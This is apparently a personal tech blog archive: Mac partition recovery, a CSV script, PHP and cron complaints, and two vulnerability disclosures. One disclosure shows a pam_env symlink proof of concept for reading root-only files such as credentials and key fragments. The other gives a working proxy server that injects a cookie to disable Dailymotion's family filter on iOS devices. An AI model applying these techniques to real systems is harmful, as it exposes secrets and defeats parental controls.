inside Habbie's mind

Mac GPT partition table recovery

written by peter, on Jan 2, 2012 6:18:00 AM.

UPDATE (Jan 12th 2012): see end of post for a much quicker restore method.

For reasons yet unknown, my Mac system disk lost its partition table (GPT) yesterday. This is how I recovered:

Finding

I booted an old copy of my OS X Install from USB and downloaded testdisk. I then used it to scan for any partitions it would recognise. Results (warning: copied by hand from photo):

Disk /dev/disk0 - 512 GB / 476 GiB - CHS 1000215216 1 1
     Partition        Start        End    Size in sectors
 P DOS_FAT_32            40     409639     409600 [EFI]
 P HFS            998945640 1000215175    1269536

The DOS_FAT_32 partition contains EFI data; the HFS partition contains OS X Lion Recovery data. Obviously, testdisk did not recognise my FileVault partition. However, it is quite likely that my data partition sits right in between these two!
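The "right in between" reasoning boils down to a bit of sector arithmetic. Here is a minimal sketch of it in Python, using only the numbers from the testdisk output above. The 512-byte sector size is an assumption (it matches the reported disk size), and the helper name is made up for illustration.

```python
SECTOR_BYTES = 512  # assumption: 512-byte sectors

# (start, end) sector pairs copied from the testdisk output above
efi = (40, 409639)
recovery = (998945640, 1000215175)


def sector_count(start, end):
    """Number of sectors in an inclusive start..end range."""
    return end - start + 1


# The missing partition starts one sector after the EFI partition
# and ends one sector before the Recovery partition.
middle_start = efi[1] + 1
middle_end = recovery[0] - 1
middle_sectors = sector_count(middle_start, middle_end)
middle_gib = middle_sectors * SECTOR_BYTES / 2**30

print(middle_start, middle_end, middle_sectors, round(middle_gib, 1))
```

The same helper reproduces testdisk's "Size in sectors" column for the two partitions it did find, which is a cheap sanity check before writing anything to disk.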

Fixing

As testdisk does not support writing Mac/GPT partition tables, I took a phone camera photo of the results above and booted into the gparted liveCD (easier than building or finding parted/gdisk binaries for OS X, I think). With both my troubled drive and my old install connected on USB, it should be easy to compare details and get everything right.

As it turns out, gparted (the GNOME GUI for parted) is extremely limited. I could not even find how to define sector boundaries for partitions, and the partition type list is quite short. The CLI version is slightly better – it allows sector specifications but is unaware of most Apple-related GPT GUIDs.

This is how I, inefficiently, set my partition table straight:

  1. Use gparted to make a new GPT table.
  2. Use parted to make 3 partitions, using the numbers from testdisk and squeezing partition 2 right in between (starting one sector after end of partition 1, ending one sector before start of partition 3). I verified the snug fit with my old install.
  3. Try to set types and names right using parted, and fail.
  4. Try the same thing with gdisk (which is on the gparted live CD), and succeed. See below for correct settings.
After this (I actually tried to boot after step 3; that did not work), my OS X is booting without trouble again. Phew.

If you’re doing this, I recommend going with gdisk straight away.

Partition map

This is how the partition map looked on my old drive, how it looks now (after this recovery) on my current drive, and how I believe the partition map on most OS X installs (at least, when using Lion with FileVault) should look:
  1. sector 40-409639 (409600 sectors, 200.0 MiB): partition type EFI, label ‘EFI System Partition’
  2. sector 409640-? (? sectors, ? GiB): partition type Apple Core Storage, label whatever
  3. sector ?-? (1269536 sectors, 619.9 MiB): partition type Apple boot, label ‘Recovery HD’
In my case, the disk extended slightly beyond the end of partition 3. For best results, use testdisk to find the question marks for partition 3. I believe both partitions 1 and 3 should be marked bootable.

For non-FileVault users, I expect the type of partition 2 is HFS+ and the label does matter (cosmetically).

Wikipedia has a very useful list of partition type GUIDs. gdisk knows about all these numbers, though.

Update, Jan 12th 2012: it happened again. This time, I went straight for gdisk instead of bothering with (g)parted. gdisk immediately offered to restore my ‘backup MBR’ but did mention something about a broken checksum. I said ‘yes’, pushed ‘w’ for write. All done.

importing toggl.com Time Entries CSV in iWork Numbers

written by peter, on Oct 22, 2011 7:53:00 PM.

When trying to put a time report together for a client, to attach to an invoice, I figured getting a CSV from toggl would be a good start. As it turns out, their CSV is not entirely suitable for importing in Numbers.

This script fixes the CSV up in a few ways:

  • it puts a single quote character in front of all timestamp fields; without it, Numbers will interpret the dates and, for me, it mixes up the day and month fields
  • it sorts the CSV by start time, ascending instead of descending

Code: (download here)

#!/usr/bin/env python
import csv
import sys
import operator

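# read the toggl CSV from stdin
r = csv.reader(sys.stdin)
rows = []
for row in r:
    # prefix the timestamp fields (columns 5-7) with a single quote,
    # so Numbers treats them as text
    for i in (5, 6, 7):
        row[i] = "'%s" % row[i]
    rows.append(row)

# keep the header row first, sort the rest by start time (ascending)
rows = [rows[0]] + sorted(
    rows[1:],
    key=operator.itemgetter(5)
)

# write the fixed-up CSV to stdout
w = csv.writer(sys.stdout)
for row in rows:
    w.writerow(row)

The script may be useful for Excel users too; I have not checked.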

it's shit like this, PHP

written by peter, on Aug 20, 2011 7:47:00 AM.

This post has two snippets of code that demonstrate some aspects of the braindeadness that appears to be inherent in PHP arrays. I suggest trying to predict the output (especially with exhibit A) before you run the scripts, for extra fun ;)

Exhibit A:

<?php
    // create empty array $a
    $a = array();
    // append two items to it
    $a[] = "a";
    $a[] = "b";
    // remove last item using array_pop
    array_pop($a);
    // append another item
    $a[] = "c";

    $b = array();
    $b[] = "a";
    $b[] = "b";
    // remove last item using unset
    unset($b[1]);
    $b[] = "c";
    // print key for value "c"
    print array_search("c", $a). "\n";
    print array_search("c", $b). "\n";
?>
This behaviour does not clearly follow from the docs.

Exhibit B:

<?php
    // create pre-filled key-less array $a
    $a = array('a', 'b');
    // dump it
    print_r($a);
    // json-dump it
    print json_encode($a)."\n";
    // add key/value item to array
    $a['x'] = 'c';
    print_r($a);
    print json_encode($a)."\n";
?>
This behaviour is described in examples in the docs. It demonstrates how braindead the PHP array type is.

(I’m on PHP 5.3.4).

twitter clients, redux

written by peter, on Jul 4, 2011 8:38:00 AM.

With the demise of Nambu into no-DM-territory, I am looking for a new Mac OS X Twitter client again. This time, no reviews, just short (rejection) notes.

from symlinks to private keys

written by peter, on May 30, 2011 3:41:00 PM.

In my previous blog post I wondered:

I don’t know what the mathematical implications of having the last few bits of a private key are, but it can’t be good.

As it turns out, for DSA, quite bad.

In short, this pam_env symlink issue, in some cases, allows an attacker to lift enough private key data from a DSA key to make brute-forcing the rest feasible.

For all details, see my article. Comments welcome on this post, or via e-mail as noted in the article.

on CVE-2010-3435

written by peter, on May 12, 2011 9:23:00 PM.

When logging in, Ubuntu shows (admin?) users some useful information, such as
70 packages can be updated.
35 updates are security updates.
I recently ran into an issue where this information popped up twice on each login – one up-to-date entry and one outdated entry. Some investigation showed that somehow /etc/motd.tail had gained these lines too. The fix (rm -f /etc/motd.tail) was simple enough.

However, in the course of this investigation I noticed that /etc/update-motd.d is basically a bunch of shell scripts that get run as root on every ssh login by any user. Scary, no?

Remembering that being able to inject some environment variables was always a great way to break out of ‘restricted’ shells that were written in (ba)sh, I set out to look at methods of influencing the environment these scripts would be run in. .ssh/environment, .pam_environment and OpenSSH’s SendEnv all turned out to be smart enough to only do their work after update-motd was done, sadly. I was out of ideas.

The code of pam_env.so did tell me another interesting thing – ~/.pam_environment is opened and read as root, without any dropping of privileges. This suggested that symlinking it to some unreadable file (of the right format, i.e. consisting of VAR=value lines) would compromise the data in that file.

A proof of concept was simple enough (newline inserted because my blog layout is too narrow):

root@vps6001:~# cat /etc/env2
ENV2=bla
...
peter@vps6001:~$ ls -al .pam_environment 
lrwxrwxrwx 1 peter peter 9 May 12 22:13
                   .pam_environment -> /etc/env2
peter@vps6001:~$ ls -al /etc/env2
---------- 1 root root 9 May 12 22:13 /etc/env2
peter@vps6001:~$ set | grep -i env
ENV2=bla
It works! This means that any file that has lines containing = (without whitespace around it) would be fair game. My first thought was /etc/mysql/debian.cnf, but that one has whitespace around the = characters.
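To get a feel for which files qualify, here is a rough sketch that lists the lines matching the criterion described above: an = with no whitespace directly around it. This is only my approximation of that one rule, not a reimplementation of the actual pam_env parser, and the function name is made up.

```python
import re


def exposed_lines(text):
    """Return lines that contain '=' with no whitespace directly around it.

    Approximation of the criterion in the text above; the real pam_env
    parser has more rules than this.
    """
    hits = []
    for line in text.splitlines():
        line = line.strip()
        # '=' must be present, and never preceded or followed by whitespace
        if "=" in line and not re.search(r"\s=|=\s", line):
            hits.append(line)
    return hits


sample = "ENV2=bla\nuser = root\npassword=secret\nAAAA==\nplain text\n"
for line in exposed_lines(sample):
    print(line)
```

In the made-up sample, the `user = root` line is skipped because of the whitespace around the =, just like /etc/mysql/debian.cnf.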

Effective targets for this trick do exist. DirectAdmin (a commercial control panel) stores MySQL login information in a suitable file, and many daemons that support LDAP expect a password stored in a similar way. Also, base64-encoded files (like SSL and ssh keys) that happen to need padding such that they end in == expose their last line this way. I don’t know what the mathematical implications of having the last few bits of a private key are, but it can’t be good.

Some internet searching revealed that this issue had previously been discovered by other people.

Ubuntu 10.04 and Debian 6 are still vulnerable to this issue. Debian has a report on file but has not acted on it yet. Ubuntu doesn’t seem to know at all.

I emailed security@ for both distributions. Debian responded within minutes, pointing me to the report they already had. I’m waiting for a response from Ubuntu.

Workaround: add user_readenv=0 to every pam_env.so listing in /etc/pam.d.
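To check whether the workaround has been applied everywhere, something like the following sketch could help. It takes the contents of one PAM config file as a string and returns the pam_env.so lines that do not yet carry user_readenv=0. The function name and the sample lines are made up for illustration, and the parsing is deliberately naive (whitespace-separated fields, # comments skipped).

```python
def lines_missing_workaround(pam_config_text):
    """Return pam_env.so lines that lack the user_readenv=0 option."""
    missing = []
    for line in pam_config_text.splitlines():
        stripped = line.strip()
        # skip blank lines and comments
        if not stripped or stripped.startswith("#"):
            continue
        fields = stripped.split()
        # the module may be listed by bare name or by full path
        uses_pam_env = any(f.endswith("pam_env.so") for f in fields)
        if uses_pam_env and "user_readenv=0" not in fields:
            missing.append(stripped)
    return missing


# hypothetical example content, not copied from a real system
sample = """\
# environment setup
session required pam_env.so readenv=1
session required pam_env.so readenv=1 user_readenv=0
session optional pam_motd.so
"""
print(lines_missing_workaround(sample))
```

Feeding it every file in /etc/pam.d in turn should give a list of the lines that still need editing.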

dreaming wikipedia

written by peter, on Feb 23, 2011 6:49:07 AM.

Last night, I dreamt that this Wikipedia-article existed, with these lines in it.

Load average


Originally defined as the difference between available system memory and free memory.

Load average can also be calculated for car engines; a common value is 2.2.

I swear I’m not making this up ;)

disabling the family filter on Dailymotion for iPhone/iPad

written by peter, on Jan 31, 2011 6:07:00 AM.

The Dailymotion REST APIs currently honour the family_filter cookie that their user-facing website uses to manage filter settings. This makes the API, effectively, not RESTful because there is state involved.

The bigger implication however, is that injecting one cookie (family_filter=off) into your iPhone/iPad-application will fully disable the family filter for that client. This would be, I suspect, a violation of Apple App Store guidelines. Of course, if people do this for their own devices, nobody cares. However, this issue would allow a competent malicious third party (or a dedicated teenager ;)) to silently enable the viewing of adult material on a device that is expected to be family-safe.

Note that jailbreaking or similar hacks are not needed to exploit this issue. Hijacking traffic at the network level, or simply pointing the iPhone/iPad’s proxy configuration to a specifically prepared server, is enough.

(On a sidenote, the iPad/iPhone app uses an older REST API that does not conform to the current API docs and also does not use HTTPS, making this issue slightly easier to exploit).

Simple working example of such a specifically prepared server:

from twisted.web import server, resource
from twisted.internet import reactor

from twisted.python import log
import sys
log.startLogging(sys.stdout)

class Simple(resource.Resource):
    isLeaf = True
    def render_GET(self, request):
        request.addCookie(
            "family_filter",
            "off",
            path="/",
            expires="Tue, 24-Jan-2012 22:26:22 GMT"
        )
        return b"{}"  # bytes literal; Twisted on Python 3 expects bytes here

site = server.Site(Simple())
reactor.listenTCP(8080, site)
reactor.run()

I doubt Dailymotion is the first or only iOS app that can be influenced by getting some cookies in. Will we see more of this?

cron considered harmful

written by peter, on Jun 22, 2010 7:19:00 AM.

On numerous occasions I have lamented both the design and the typical usage of cron to friends and other geeks. My main gripes:
  • jobs are not protected against running concurrently (design issue)
  • intervals are fixed (design issue)
  • people tend to schedule the same job at the same time on whole clusters of machines (typical usage issue)
The first issue can be fixed with tools like lockfile and setlock — a lot of red tape for something that should be a default feature.
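For jobs written in Python, the same protection can be had without an external tool. Below is a minimal sketch using flock from the standard fcntl module (Unix only). It is not how lockfile or setlock work internally, just the same idea; the function name and lock file location are made up.

```python
import fcntl
import os
import tempfile


def try_lock(path):
    """Return an open, exclusively locked file object, or None if the
    lock is already held by another run of the job."""
    handle = open(path, "w")
    try:
        # LOCK_NB: fail immediately instead of waiting for the lock
        fcntl.flock(handle, fcntl.LOCK_EX | fcntl.LOCK_NB)
    except OSError:
        handle.close()
        return None
    return handle


def main():
    # hypothetical lock file location
    lock_path = os.path.join(tempfile.gettempdir(), "myjob.lock")
    lock = try_lock(lock_path)
    if lock is None:
        print("previous run still busy, skipping")
        return
    print("got the lock, running the job")
    # ... the actual job goes here; the lock is released when the
    # file is closed or the process exits
    lock.close()


if __name__ == "__main__":
    main()
```

Because the kernel drops the lock when the process dies, a crashed job cannot leave a stale lock behind, which is one less thing to clean up by hand.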

The second and third issues are closely related in that both cause undesirable load spikes because many things happen at the same time, either because of intervals phasing up or because of similar jobs running on a bunch of machines at the same time, perhaps hammering the network.
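One way to take the edge off such spikes is to give every machine its own fixed offset within a time window, derived from a hash of its hostname. The sketch below shows that idea; it is my own illustration and not necessarily the approach from any of the posts mentioned here. The function name, hostnames and job name are made up.

```python
import hashlib


def splay_seconds(hostname, job_name, window_seconds):
    """Return a stable per-host delay in the range [0, window_seconds)."""
    key = ("%s:%s" % (hostname, job_name)).encode("utf-8")
    digest = hashlib.sha256(key).digest()
    # use the first 8 bytes of the hash as a big integer
    return int.from_bytes(digest[:8], "big") % window_seconds


# hypothetical hostnames; each gets its own offset within the hour
for host in ("web1.example.org", "web2.example.org", "web3.example.org"):
    print(host, splay_seconds(host, "logrotate", 3600))
```

A job would sleep for this many seconds before starting. Since the offset is derived from the hostname rather than drawn at random, each machine still runs at a predictable time.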

A specific pet peeve is Mailman Reminder Day. Firstly, I just don’t see the point; if my address is on a mailing list and that list is practically dead, I just don’t care. Secondly, it means every first of the month I have tens of reminders that I just delete. Some of these lists are busy — for those, the reminder is a minor nuisance. But many lists are extremely quiet (think software release announcements) and for some of these lists, the reminders are over 50% of the total mail volume. It’s so wasteful. Also, I can’t help but think that all those reminders being sent out at the same time (well, divided over 24 hours because of time zone differences) cannot be good for the mail ecosystem as a whole.

For issues two and three, Colm MacCárthaigh wrote a few great posts detailing why cron is bad, and showcasing one potential solution to the issues at hand. I suggest reading these posts fully, they are very insightful:

This post was inspired by my pet peeve about Mailman and about jobs unintentionally running in parallel; it was triggered by Job Snijders pointing me to another interesting post; Colm’s posts above were referred to in the comments.

silly Python unicode mistake

written by peter, on Jun 12, 2010 7:58:00 AM.

For a simple blog-to-twitter posting gateway (source code) I’m relying on the excellent feedparser and twitter modules, and I am trusting them to handle unicode strings without trouble. With most well-written Python modules (and these two are no exception!) methods will return unicode strings as they see fit, and other methods will accept these unicode strings and handle all the nitty-gritty encoding details for me.

A simplified version of my workflow would look like this:

def post(entry):
  title = entry.title
  print "posting [%s]" % title
  api.PostUpdate(title) # api is a twitter Api object

feed = feedparser.parse(config["feed"])
for e in reversed(feed.entries):
  if not e.id in seen:
    post(e)
This code bombed out with an exception on the first post that had a non-ASCII title. Can you spot why?

It’s the print statement. All the APIs I’m using have zero trouble with unicode, but print wants to encode for your terminal and it’ll usually assume that that is ASCII. My ‘debugging’ output actually broke the program. My workaround is to say title.encode("ascii","replace")

Brend on #python pointed out to me that the issue is not, exactly, print. The issue is interpolating title into a non-unicode string. Depending on environment, using print on the unicode object might in fact work. For those environments, saying print u"posting [%s]" % title could help. In my case however, I ran into the issue from cron with no locale set at all, so dumbing the string down to ascii is still the right thing to do.
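For completeness, a small sketch of the "dumb it down to ASCII" workaround, wrapped in a helper. The helper name and the sample title are made up. The extra decode step is my addition: it turns the result back into a text string, so the same code behaves sensibly on Python 3 as well.

```python
def ascii_safe(text):
    """Replace every non-ASCII character with '?'."""
    return text.encode("ascii", "replace").decode("ascii")


title = u"caf\u00e9 ouvert"  # made-up title with one non-ASCII character
print("posting [%s]" % ascii_safe(title))
```

This loses information, of course, but for debugging output under cron that is a fair trade for never crashing on a title.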